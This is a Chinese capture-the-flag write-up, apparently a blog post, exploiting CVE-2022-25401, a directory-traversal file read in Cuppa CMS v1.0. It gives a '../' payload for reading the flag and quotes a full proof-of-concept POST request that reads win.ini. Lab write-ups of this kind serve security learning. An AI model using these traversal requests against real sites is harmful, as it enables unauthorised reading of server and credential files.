春秋云境CVE-2022-25401

简介

Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞

吐槽

这关挺抽象的,靶场提供的路径是错误的,让我们无法访问到,实际靶场的路径是/templates/default/html/windows/right.php

正文

首先来到靶场,就看到一个登录界面,这是要我来一个弱口令登录吗?然后直接开始弱口令,结果跑完了发现我的弱口令进不去。

直接访问

然后我就尝访问/templates/default/html/windows/right.php地址,发现我能直接访问到,但是访问到的界面是一个空白界面。f12发现有源码,那么就访问的没问题了。但是这什么提示也没有,我也读取不了其他文件呀。于是我就去网上查看了一下这个漏洞的poc发现这里控制的参数是url且为PSOT传参。

直接传参

那么话不多说直接上参数:?url=../../../../../../../../../../flag

这里提示一下,我们不要担心../打的太多,没关系的,这是目录穿越,我们访问上一层目录大于它的目录结构,一样是访问到根目录,没有区别,所以为了防止我们访问的时候没有访问到根目录,所以我们会习惯性的多打几个../访问后还是空白界面,别急我们直接查看源码,发现flag就在源码里面。

参考资料

这是gethub上的poc:

POST /cuppa_cms/administrator/templates/default/html/windows/right.php HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 272
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.174.133
Referer: http://192.168.174.133/cuppa_cms/administrator/
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

id=1&path=component%2Ftable_manager%2Fview%2Fcu_views&uniqueClass=window_right_246232&url=../../../../../../windows/win.ini

我们可以很明显的看到这里是用url参数来进行的目录穿越,所以我想了一下,直接只用url参数呢,没想到真的可以。就省去其他参数的必要了

  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值